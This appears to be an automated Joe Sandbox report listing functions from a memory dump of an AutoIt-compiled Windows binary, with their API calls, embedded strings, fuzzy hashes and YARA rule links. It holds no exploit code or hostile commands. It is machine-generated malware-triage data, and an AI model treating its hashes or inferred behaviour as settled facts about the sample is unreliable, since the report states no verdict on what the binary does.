Instruction Fuzzy Hash: 74319A31500204AEEB109F68DC91FBBB7A9FF4A764F048619F8A9C7190CA31AD85CB70

Function 00D85B75 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D85BE4
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00D85C1F

Strings

0, xrefs: 00D85BDD

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: ffbf3446e3962c58a603d3ad8daa93988c4d7c490063bf7554e6aa993b5a00d1
Instruction ID: 5a86b894cdcfbe4e3a41e79f8fa463634c00a3e9d8897c7d75db9771fc483e19
Opcode Fuzzy Hash: ffbf3446e3962c58a603d3ad8daa93988c4d7c490063bf7554e6aa993b5a00d1
Instruction Fuzzy Hash: B331B671600709ABDB24EF99E885BAEBBF5FF05350F1C4019E981D61A8E7B09A44CF31

Function 00D96B60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00D96BDD

Part of subcall function 00D4CAEE: _memmove.LIBCMT ref: 00D4CB2F

Strings

, $, xrefs: 00D96C1D
AUTOITCALLVARIABLE%d, xrefs: 00D96BCF

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 3506404897-2584243854
Opcode ID: 57687cc4bbb28ce656f733b4ae65f30f527146343690ab212386a7aa6d34cb7b
Instruction ID: d1f1ad4db9516e0b295db8f74e428068f86e8d5c21efc63fdda41e3335c2fff8
Opcode Fuzzy Hash: 57687cc4bbb28ce656f733b4ae65f30f527146343690ab212386a7aa6d34cb7b
Instruction Fuzzy Hash: FE213C31600218BFCF10EFA8C882EAE7BA5EF44700F554455F545A7281EA74EA45CBB1

Function 00DA91DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00DA9269
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00DA9274

Strings

Combobox, xrefs: 00DA9236

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 089dfb52dfab864d0c26168bc7bf81908429252d3cefc1c758291aac86423b68
Instruction ID: ed66f1ca6472133e5c217f829ffbece4a3154b806159a2bee016a42e2fc88267
Opcode Fuzzy Hash: 089dfb52dfab864d0c26168bc7bf81908429252d3cefc1c758291aac86423b68
Instruction Fuzzy Hash: 5511B271300209BFEF218E54DC90FBBB76AEB8A3A4F548125F9189B290D631DC518BB4

Function 00DA970B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00D5C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00D5C657
Part of subcall function 00D5C619: GetStockObject.GDI32(00000011), ref: 00D5C66B
Part of subcall function 00D5C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D5C675

GetWindowRect.USER32(00000000,?), ref: 00DA9775
GetSysColor.USER32(00000012), ref: 00DA978F

Strings

static, xrefs: 00DA9752

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: a87096dba631342059469e0af9f15a2a6e155ccebafcf8e9393ec52cae0d556d
Instruction ID: 295daa1fe5bb6a03ac3b176f7730d3074b58648b79c803e8f5e82afa44b5e3f7
Opcode Fuzzy Hash: a87096dba631342059469e0af9f15a2a6e155ccebafcf8e9393ec52cae0d556d
Instruction Fuzzy Hash: 5211567252020AAFDB05DFB8CC45EEABBA8EB09304F054929F956E3240E635E851DB60

Function 00DA9424 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00DA94A6
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00DA94B5

Strings

edit, xrefs: 00DA948A

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: d392792fe5ec6dc1e6055f9353d468af4ff4ca0c6717405a55c9182fd6867439
Instruction ID: 01884c3d276d31176b858443fc14387f5cd4f3ec4a7d94d8221d971a6b702524
Opcode Fuzzy Hash: d392792fe5ec6dc1e6055f9353d468af4ff4ca0c6717405a55c9182fd6867439
Instruction Fuzzy Hash: 7E118C71100209AFEF108EA4DC90EEB7B6AEB0A378F108724F965971E0C7B5DC569B74

Function 00D85C80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D85CF3
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00D85D12

Strings

0, xrefs: 00D85CEC

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: a9df6c9623aa8a2f8143430923063b0ee94c6d7f8246ae450214c969e6b59e2b
Instruction ID: ce86d954617574c42850d0c78245fe7679359bc11b44b9ebf08b85cbfe3e91e9
Opcode Fuzzy Hash: a9df6c9623aa8a2f8143430923063b0ee94c6d7f8246ae450214c969e6b59e2b
Instruction Fuzzy Hash: 0E119076901618ABDB20EB58EC48B9977FDAB06344F1C0025ED41EB195D370EE44CBB1

Function 00D953F6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00D9544C
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00D95475

Strings

<local>, xrefs: 00D9543D

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: b95ad11ceb99ffbd5ca2d85c9b27827b847d599f0a1ae526a9e168b5e897a85b
Instruction ID: 8be0500c8550ec1388ae07c9ec9590637908de67526c241f77785fed6a4cf56b
Opcode Fuzzy Hash: b95ad11ceb99ffbd5ca2d85c9b27827b847d599f0a1ae526a9e168b5e897a85b
Instruction Fuzzy Hash: 60119E70141A22BADF668F51AC84EFAFAA8EF12752F10823AF54596044E270A990C7B1

Function 00D6B4BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D74557
___raise_securityfailure.LIBCMT ref: 00D7463E

Strings

(, xrefs: 00D74639

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: (
API String ID: 3761405300-2982846942
Opcode ID: 134ab70f422990eccf98c17df2e03838c1107f6c204ffa60d3f33347792703da
Instruction ID: 24eda2c7820686196940c37dfb6d67bf330a3527407969f89e4ac400b7c625b2
Opcode Fuzzy Hash: 134ab70f422990eccf98c17df2e03838c1107f6c204ffa60d3f33347792703da
Instruction Fuzzy Hash: 7C2100B55102049FDB00DF5AE9957503BA0BB58314F20982AE508FA3A0E7F2A9CACB65

Function 00D9ACD3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON

Download Yara Rule

APIs

inet_addr.WS2_32(00000000), ref: 00D9ACF5
htons.WS2_32(00000000), ref: 00D9AD32

Strings

255.255.255.255, xrefs: 00D9AD0D

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: htonsinet_addr
String ID: 255.255.255.255
API String ID: 3832099526-2422070025
Opcode ID: 6ea54feb2308c1bd1704f6082484adfdc56677879aaa5c0adb2489ea2482758f
Instruction ID: ba2df2d3a0a7634837fef17eda902bf3b5899b179cd60e2eff5d24a01297c471
Opcode Fuzzy Hash: 6ea54feb2308c1bd1704f6082484adfdc56677879aaa5c0adb2489ea2482758f
Instruction Fuzzy Hash: A901D236200306ABCF10AFA8CC86FADB365EF44720F10852AF9169B3D1E671E804C7B5

Function 00D7C577 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D4CAEE: _memmove.LIBCMT ref: 00D4CB2F

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00D7C5E5

Strings

ListBox, xrefs: 00D7C5AF
ComboBox, xrefs: 00D7C581

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: MessageSend_memmove
String ID: ComboBox$ListBox
API String ID: 1456604079-1403004172
Opcode ID: 521e0ab384f6f29509f7863e401e526ba64fa60d33c10c85ec643290677491e1
Instruction ID: d91bc7ee82f79d46b4316e43a32c3e01fca2d011fda451196d9b287349684063
Opcode Fuzzy Hash: 521e0ab384f6f29509f7863e401e526ba64fa60d33c10c85ec643290677491e1
Instruction Fuzzy Hash: 9F01D471651258AFCB08EBA4CC92CFE736AEF46310B144A19F467E72D1EB35A90C9770

Function 00D8C4D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00D8C4EF
__fread_nolock.LIBCMT ref: 00D8C504

Strings

EA06, xrefs: 00D8C532

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 21080015654947e04fb2a77b902a6cfccfae62b116ec14ec1e3a1a9b9d8c2af7
Instruction ID: d1297ce3cb3d08781a0116f97108d80efc6dfef941259f388fd358d94f25af9a
Opcode Fuzzy Hash: 21080015654947e04fb2a77b902a6cfccfae62b116ec14ec1e3a1a9b9d8c2af7
Instruction Fuzzy Hash: 8301F172900218AEDB28DBA8C856EBEBBF8DB05311F00419AE593D6181E4B4E7088B70

Function 00D7C473 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D4CAEE: _memmove.LIBCMT ref: 00D4CB2F

SendMessageW.USER32(?,00000180,00000000,?), ref: 00D7C4E1

Strings

ListBox, xrefs: 00D7C4AB
ComboBox, xrefs: 00D7C47D

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: MessageSend_memmove
String ID: ComboBox$ListBox
API String ID: 1456604079-1403004172
Opcode ID: b1e962926bd728c26711552ce6080183a34c4f13152fe5bcb20d96c9590445cc
Instruction ID: a0c945db076423b0c28042c51f3772901d6533d00a809d79c07967944f7daaf2
Opcode Fuzzy Hash: b1e962926bd728c26711552ce6080183a34c4f13152fe5bcb20d96c9590445cc
Instruction Fuzzy Hash: C701A271651108AFCB04EBA4C9A3EFF73A9DF05305F144029B547E32C2EA54AE0D96B1

Function 00D7C4F6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D4CAEE: _memmove.LIBCMT ref: 00D4CB2F

SendMessageW.USER32(?,00000182,?,00000000), ref: 00D7C562

Strings

ListBox, xrefs: 00D7C52E
ComboBox, xrefs: 00D7C500

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: MessageSend_memmove
String ID: ComboBox$ListBox
API String ID: 1456604079-1403004172
Opcode ID: 131c57af61f2532ec5e78d3315349e5ef31824fb9e3b4da719770cd74274a454
Instruction ID: 0440d2ace739d67071f18031daac1d3687d5fcc9c905225f9c620ddb981e4610
Opcode Fuzzy Hash: 131c57af61f2532ec5e78d3315349e5ef31824fb9e3b4da719770cd74274a454
Instruction Fuzzy Hash: 1201D171A51108AFCB04EBA4C953EFF73ADDB05701F149029B507F32C2EA65AE0D92B1

Function 00D8804C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00D8806A
_wcscmp.LIBCMT ref: 00D8807C

Strings

#32770, xrefs: 00D88076

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: a3d400c417cc86b0e12fb5c8b1933745f4e21ff6b44fb76f159031ccaeba422b
Instruction ID: 50f7635fdbf2db7acf9e68f8bed414e18630533e02caac4558c058021d9f821b
Opcode Fuzzy Hash: a3d400c417cc86b0e12fb5c8b1933745f4e21ff6b44fb76f159031ccaeba422b
Instruction Fuzzy Hash: B2E0D8336003292BD720EAA69C0AFE7FBACFB51764F010026F964E3141E6B0964587F4

Function 00D7B35D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00D7B36B

Part of subcall function 00D62011: _doexit.LIBCMT ref: 00D6201B

Strings

AutoIt, xrefs: 00D7B35F
Error allocating memory., xrefs: 00D7B364

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: 120465a8b348c26f0b26b26eee7150575a6e054ae33b46d0038121810e36e809
Instruction ID: 667e25b66e0ea36cb38cd93f01c964c6ead641434362f13d5b29aa4338f156cd
Opcode Fuzzy Hash: 120465a8b348c26f0b26b26eee7150575a6e054ae33b46d0038121810e36e809
Instruction Fuzzy Hash: 90D012312C431837D21522D46C0BFD576888F15B55F054026BF4C962C29AD595C081B9

Function 00DBBC74 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 00DBBAB8
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00DBBCAB

Strings

WIN_XPe, xrefs: 00DBBACB

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
